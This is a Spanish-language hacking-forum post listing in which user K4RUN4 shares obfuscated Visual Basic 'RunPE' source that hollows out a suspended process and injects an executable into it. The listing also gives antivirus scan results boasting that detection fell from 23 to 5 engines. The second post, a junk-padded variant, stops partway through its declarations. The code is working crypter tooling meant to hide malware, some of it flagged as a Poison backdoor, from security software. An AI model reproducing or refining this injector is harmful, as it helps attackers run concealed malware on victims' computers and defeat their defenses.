Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - K4RUN4

Páginas1
#1
Códigos Fuentes / Runpe Mod 2º
Diciembre 08, 2012, 10:54:12 PM
Código: vb
Private Const F447LC9Xk As Long = &H10007
Private Const nW3PkSMii As Integer = 260
Private Const uAEcIoE8o As Long = &H4
Private Const eSzW7GQdf As Long = &H1000
Private Const HdsMEIXAx As Long = &H2000
Private Const bCd05T2O6 As Long = &H40
Private Declare Function CreateProcessA Lib "kernel32" (ByVal ZEuNODw1p As String, ByVal xMmicgUXB As String, ByVal nHQpEku43 As Long, ByVal QQ9E2IRO2 As Long, ByVal sf7Q6FWqz As Long, ByVal klh1LC0qa As Long, ByVal gpOq0ar08 As Long, ByVal lqV4QmVRl As Long, A9XZ0eH3c As IQVNXBW1K, XTbTNStC1 As IEuMTkEWN) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal fwp8F4lI1 As Long, UZLbQvjpN As Any, ADhSYKaSj As Any, ByVal rPTyCbu0O As Long, FRzhBrXZ3 As Long) As Long
Private Declare Function MJbmWIYXu Lib "kernel32" Alias "OutputDebugStringA" (ByVal vXeYdumBr As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32            " (coZ2NvrKQ As Any, nxNRVRMkt As Any, ByVal W3EjZ6INJ As Long)
Private Declare Function CallWindowProcW Lib "user32               " (ByVal x9gbSV7nf As Long, ByVal Jwx0qigOk As Long, ByVal XMGKQAwG0 As Long, ByVal FR8tPRVTq As Long, ByVal rd7Ig24TO As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal R9W0Wwz8O As Long, ByVal bEH39kATm As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal PSc4W5Rzh As String) As Long
Private Type l741Ghab0
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type IQVNXBW1K
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type IEuMTkEWN
fwp8F4lI1 As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
Private Type Aa5vmpDi3
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type Rk3tnkYdN
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As Aa5vmpDi3
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type K2X0B2HMz
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type DL1Kv8t0h
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private Type kEnzAI55k
VirtualAddress As Long
Size As Long
End Type
Private Type KjpHYYXJc
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As kEnzAI55k
End Type
Private Type SneHkJnLR
Signature As Long
FileHeader As DL1Kv8t0h
OptionalHeader As KjpHYYXJc
End Type
Private Type k9W00b66a
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Public Function okLbTkVkI(REbjcq5c4 As String, RfhiH80fE As Integer)
    Dim e2u96yIrC As Integer
    
    For e2u96yIrC = 1 To Len(REbjcq5c4)
        Mid(REbjcq5c4, e2u96yIrC, 1) = Chr(Asc(Mid(REbjcq5c4, e2u96yIrC, 1)) - RfhiH80fE)
    Next e2u96yIrC
    okLbTkVkI = REbjcq5c4
End Function
Sub cgjyTadqQ(ByVal sHost As String, ByRef ADhSYKaSj() As Byte, parameter As String)
Dim tFogYBkqM As Long
Dim Bu5wgPZne As K2X0B2HMz
Dim HIKRNiitq As SneHkJnLR
Dim UhtIMHdMW As k9W00b66a
Dim axquzdtgF As IQVNXBW1K
Dim lJYqbyJJM As IEuMTkEWN
Dim DukBkGsk0 As Rk3tnkYdN
axquzdtgF.cb = Len(axquzdtgF)
RtlMoveMemory Bu5wgPZne, ADhSYKaSj(0), 64
RtlMoveMemory HIKRNiitq, ADhSYKaSj(Bu5wgPZne.e_lfanew), 248
CreateProcessA sHost, okLbTkVkI(wVAxmxZR0("/", wVAxmxZR0(";", "2")), wVAxmxZR0("<", wVAxmxZR0(";", "5"))) & parameter, 0, 0, False, uAEcIoE8o, 0, 0, axquzdtgF, lJYqbyJJM
mOCsghEaW okLbTkVkI(wVAxmxZR0("|,rzz", "8"), wVAxmxZR0("<", wVAxmxZR0(";", "5"))), okLbTkVkI(wVAxmxZR0("U{\uthw]pl~VmZlj{pvu", "3"), wVAxmxZR0(wVAxmxZR0(";", "2"), "5")), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("fy,,,...q|Q||sUˆ", wVAxmxZR0("<", "3")), wVAxmxZR0("8", wVAxmxZR0(wVAxmxZR0("<", "3"), "8"))), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase, HIKRNiitq.OptionalHeader.SizeOfImage, eSzW7GQdf Or HdsMEIXAx, bCd05T2O6
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase, ADhSYKaSj(0), HIKRNiitq.OptionalHeader.SizeOfHeaders, 0
For tFogYBkqM = 0 To HIKRNiitq.FileHeader.NumberOfSections - 1
RtlMoveMemory UhtIMHdMW, ADhSYKaSj(Bu5wgPZne.e_lfanew + 248 + 40 * tFogYBkqM), Len(UhtIMHdMW)
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase + UhtIMHdMW.VirtualAddress, ADhSYKaSj(UhtIMHdMW.PointerToRawData), UhtIMHdMW.SizeOfRawData, 0
Next tFogYBkqM
DukBkGsk0.ContextFlags = F447LC9Xk
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("LjyYmwjfiHtsyj}y", "4"), wVAxmxZR0(wVAxmxZR0("<", "3"), "8")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal DukBkGsk0.Ebx + 8, HIKRNiitq.OptionalHeader.ImageBase, 4, 0
DukBkGsk0.Eax = HIKRNiitq.OptionalHeader.ImageBase + HIKRNiitq.OptionalHeader.AddressOfEntryPoint
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`raurnqP|{r...", "4"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`sƒ{sbv€sor", "5"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread
End Sub
 Function mOCsghEaW(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim iaQt4rNA9 As Long
Dim cluYs57Jw(&HEC00& - 1) As Byte
Dim tFogYBkqM As Long
Dim xsYHO71Kp As Long

xsYHO71Kp = GetProcAddress(LoadLibraryA(sLib), sMod)
If xsYHO71Kp = 0 Then Exit Function

iaQt4rNA9 = VarPtr(cluYs57Jw(0))
RtlMoveMemory ByVal iaQt4rNA9, &H59595958, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
RtlMoveMemory ByVal iaQt4rNA9, &H5059, &H2: iaQt4rNA9 = iaQt4rNA9 + 2
For tFogYBkqM = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal iaQt4rNA9, &H68, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, CLng(Params(tFogYBkqM)), &H4: iaQt4rNA9 = iaQt4rNA9 + 4
Next
RtlMoveMemory ByVal iaQt4rNA9, &HE8, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, xsYHO71Kp - iaQt4rNA9 - 4, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
RtlMoveMemory ByVal iaQt4rNA9, &HC3, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
mOCsghEaW = CallWindowProcW(VarPtr(cluYs57Jw(0)), 0, 0, 0, 0)
End Function

Public Function wVAxmxZR0(eczX16djq As String, cW5sVXYkV As Integer)
    Dim wlUnDp6U2 As Integer
    
    For wlUnDp6U2 = 1 To Len(eczX16djq)
        Mid(eczX16djq, wlUnDp6U2, 1) = Chr(Asc(Mid(eczX16djq, wlUnDp6U2, 1)) - cW5sVXYkV)
    Next wlUnDp6U2
    wVAxmxZR0 = eczX16djq
End Function


Date and Time: 12/8/2012 8:47:39 PM
File Name: Antes.exe
File Size: 16384 Bytes
MD5: 5d0e5cf9778421e9ad666d8d74a9e116
SHA1: e2d9ccc127170966fcf49725618a59d19df1cad7
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Trojan horse Injector.CBI
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.Qqlame

eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
G Data - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected SScope.Trojan.VBRA.3587
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)
BullGuard - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
Immunet Antivirus - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
K7 Ultimate - Riskware ( ed2edfef0 )
NANO Antivirus - Clean!
VIPRE - VirTool.Win32.VBInject.gen.bp (v)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Date and Time: 12/8/2012 8:43:12 PM
File Name: Final.exe
File Size: 20480 Bytes
MD5: f6f0b5f07628932200386c2e26522310
SHA1: f626a85cff0e06a7a722cad6917bc57fd5651c8a
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - Clean!
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Backdoor.Win32.Poison
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Suspicious
A-Squared - Backdoor.Win32.Poison!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Clean!
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Clean!
NANO Antivirus - Clean!
VIPRE - Clean!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Visual Basic / Runpe Mod K4
Octubre 11, 2012, 05:04:34 PM
Runpe Generador skyweb007
Código: vb

Private Const iTODXOFScMLkMiuJqI As Long = 884210437
Private Const oHlUFbB7c As Long = &H10007
Private Const KPoPaUmjGcBsoBRgCp As Long = 43885802

Private Const UdpSlRoHgHSMeNkUek As Long = 571456721
Private Const XkLbWZwT0 As Integer = 260
Private Const BvJabvwHeMpFlrLTJo As Long = 666743405

Private Const UZKDKoCBRUXPnDyfOQ As Long = 623572428
Private Const bTQl9oDeY As Long = &H4
Private Const rtZtAIvclmkpNTaFSR As Long = 667513285

Private Const PSKiMqoWLfWMakTTGH As Long = 670505035
Private Const E4r2NPXmu As Long = &H1000
Private Const gfkVOVAaMcfiacHqmb As Long = 865706641

Private Const kFYSInvwyBlelQdcsy As Long = 73541772
Private Const EQIAtwHT0 As Long = &H2000
Private Const NPHgynYGIcFKYUDQpp As Long = 346262605

Private Const PAHOeFFULNFeHljRGa As Long = 314522005
Private Const mvUSFCqYB As Long = &H40
Private Const qhYmvfeSFfCOcKbOSr As Long = 554761501


Private Declare Function FOZTxMgzSNCirs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function gZhKYQnrtlK Lib "winmm.dll" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
Private Declare Function CkmGjoCMhviUvRQtar Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function HitnFCZ Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function LHTkzUIRpkNPwQVeSzH Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Td57zdeAJ As String, ByVal irp2fgyco As String, ByVal RdLggVr0Q As Long, ByVal Fjn88KRAm As Long, ByVal VKa5eOX4s As Long, ByVal heV8nTQUC As Long, ByVal ofKb6Slk8 As Long, ByVal MCJpy2ujw As Long, jvQsfC7ZK As HvWIgrbaI, OpDxItsdy As Ikr1WTQJc) As Long
Private Declare Function LjqxbonDHKBbqjS Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function YAESOxLllLUhJd Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
Private Declare Function yYyJDVF Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function VcYkAPQZiFAegMSm Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function PKLJOzGN Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function ETJMEdGljQFaQH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long

Private Declare Function BdlxatZwObOMG Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function scnspARSopyQDhwdjCK Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function bcafPI Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
Private Declare Function UGQbdUuQBmh Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function hYlwfeRDfB Lib "winmm.dll" () As Long
Private Declare Function JbMQr Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal CE9yvfJTt As Long, b5IFtuNEU As Any, jJge24yxK As Any, ByVal U3W2edK9C As Long, fjly1tZq8 As Long) As Long
Private Declare Function QpmIfD Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function QTjEFOZTxMgzSN Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function rsqvgZh Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
Private Declare Function QnrtlKaRCkmGjoCMhviU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QtareiHitnFCZvTLHT Lib "gdi32" (ByVal hGDIObj As Long) As Long

Private Declare Function KFjlRlrzo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function echEKR Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
Private Declare Function IZdfQwLDoVYsUank Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function FFhpCey Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function TtTfZraxhrxtF Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function suDbVzBi Lib "winmm.dll" () As Long
Private Declare Function WSkaKIVom Lib "kernel32" Alias "OutputDebugStringA" (ByVal cgRmc7IJv As String) As Long
Private Declare Function PEkggfkUbjzaZpf Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function ycGEm Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function lcqAjjVQxGS Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function tRkvkhbtqNxHNJVmn Lib "gdi32" (ByVal hMetaFile As Long) As Long


Private Declare Function etagzHxdYYQcM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function rRDTQaRqTyieSneUi Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
Private Declare Function bOAcy Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function GYJNocaTmjFbzFBNQgBC Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QuJcwPKzfopnsdVdHUT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function qiHVOzhjD Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (AxGGLYZ7E As Any, d2l6uk0Pt As Any, ByVal l1p6nLoNB As Long)
Private Declare Function yJerfQsO Lib "winmm.dll" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
Private Declare Function QoaeEfqkC Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function sQIEPhwRFOmhKMtMSbP Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function FDIgmuYlkAEGyY Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function PxzTwB Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long

Private Declare Function CemzbuayPqQcV Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function tdouqBSipqAYSwyelEMB Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function dbgRY Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function QVmcfQvYDBj Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function iZnxggSSuC Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function CallWindowProcA Lib "USER32" (ByVal Tg75MhFRu As Long, ByVal gEdEnMOb8 As Long, ByVal EmFxf7Lra As Long, ByVal TNZRPnQNL As Long, ByVal wZ1lfnc1U As Long) As Long
Private Declare Function LqOgsheYqn Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function EKGSjkFHQoU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function vBUdRxttswibiMnZo Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function nLpTDzoIypD Lib "gdi32" (ByVal hColorSpace As Long) As Long

Private Declare Function ZvHVDUGKlZVP Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function CYwCyK Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function xzISN Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function ZtMGwcllkpaSaER Lib "winmm.dll" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function knfDSLv Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function AdivFbo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal qkrvtMeXS As Long, ByVal Sa39iyURB As String) As Long
Private Declare Function pLKmTlQbBbnhywSoM Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function MetOBLjeHJpJO Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function sBCAFdjqUihxADvUj Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function uwQtyLIrEeeFNbCQ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function rRsDx Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long

Private Declare Function VRduJQSczuYaGMgodI Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function DHtzGYyxNDGyQA Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
Private Declare Function KzTJAO Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function HuuVfrSnRqITIFz Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Private Declare Function mVgmiuKLhjsPxaqQd Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal SCgYSjXPN As String) As Long
Private Declare Function tZUUTZJCJoOAQT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function nQvfbPkbQfpYYKxZv Lib "winmm.dll" () As Long
Private Declare Function DUGKlZVPifCYwCyKNcx Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function SNrGZtMGwcllkpa Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long


Private ihwBEyUjcMuvRtMWrF As Long
Private eGcbDkCnrSrDvPNjFd As Double
Private SdWlHtEbWACiCIQFkt As String
Private swVbiNaZptynNcUFmo As Byte
Private Type tX1G1gc6e
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Private BjvWWwGTuPtSjKkypI As Long
Private OwIOKWmCJLUrmQSFYg As Double
Private BvvyAlrAQqpGyqPsXV As Boolean
Private rMCsHRAAmnOXjMfKiB As Currency
Private BwrKHeOYeamDEZbkIp As Date
Private iPVovlSNNMRCuCgHsJ As Currency
Private Type HvWIgrbaI
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private eJsodwnesDllYLmIVj As Date
Private iUYwmjdysQlKQMYbpL As Currency
Private WgaEUmHaUKpwCngnSe As Integer
Private uwBsRgZJqtOquJToCo As Integer
Private Type Ikr1WTQJc
CE9yvfJTt As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type

Private bJaMQqQbVnkIdCuqCT As Single
Private DqBYTvweEMChqqpuRY As Integer
Private KXWmpskJYRBjlGinBw As Integer
Private tTTuDQrLqPgHhsmFnK As String
Private FLHSjGHRojNPuCVcSw As String
Private Type rVuaHnLLV
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

Private ioyNnmDsynMoUSAoJp As Double
Private jSRFFgoBdvcBSeSQKc As Double
Private yfqvsEVWrsDaHkAgnG As Currency
Private EjefdiTNUwZKaehYwa As Byte
Private plZukbpAiiVIiFSgNf As Date
Private VujgaspMiHNJUXmIJT As Integer
Private Type vQYh9rmTo
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As rVuaHnLLV
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Private jEXRHmuytkdkPbbquw As Long
Private OdWGnqLnrGQllYAVUv As Integer
Private yhlLlvqJGdXPMXoDYM As Double
Private tnRTAUZhXDMMLPmtBf As Long
Private rHLOGetmWEHbEIWTCP As Long
Private oQYkNgMjCbCNHZJfPa As Integer
Private Type IG4wyJbPZ
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

Private uDEOlgKLrwRZPupqot As Integer
Private lsJkjAprjJlQOvkGym As Boolean
Private LttggIQdFYEctGtrlE As Boolean
Private XHSYUfvwTUeCiMbIPh As Long
Private Type yDQ4fPIlY
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

Private DBGqkrVvhwCFyVwdNJ As String
Private SINXGGsfGcpEkDosSH As Boolean
Private wQNjGekgruKfgqAuYo As Byte
Private buoeKSTRWIBImOSVNl As Boolean
Private tdLOiLPdnJWJyXsrUC As Date
Private Type opSQywttF
VirtualAddress As Long
Size As Long
End Type

Private JUOgdBWumiuMayjsRL As Long
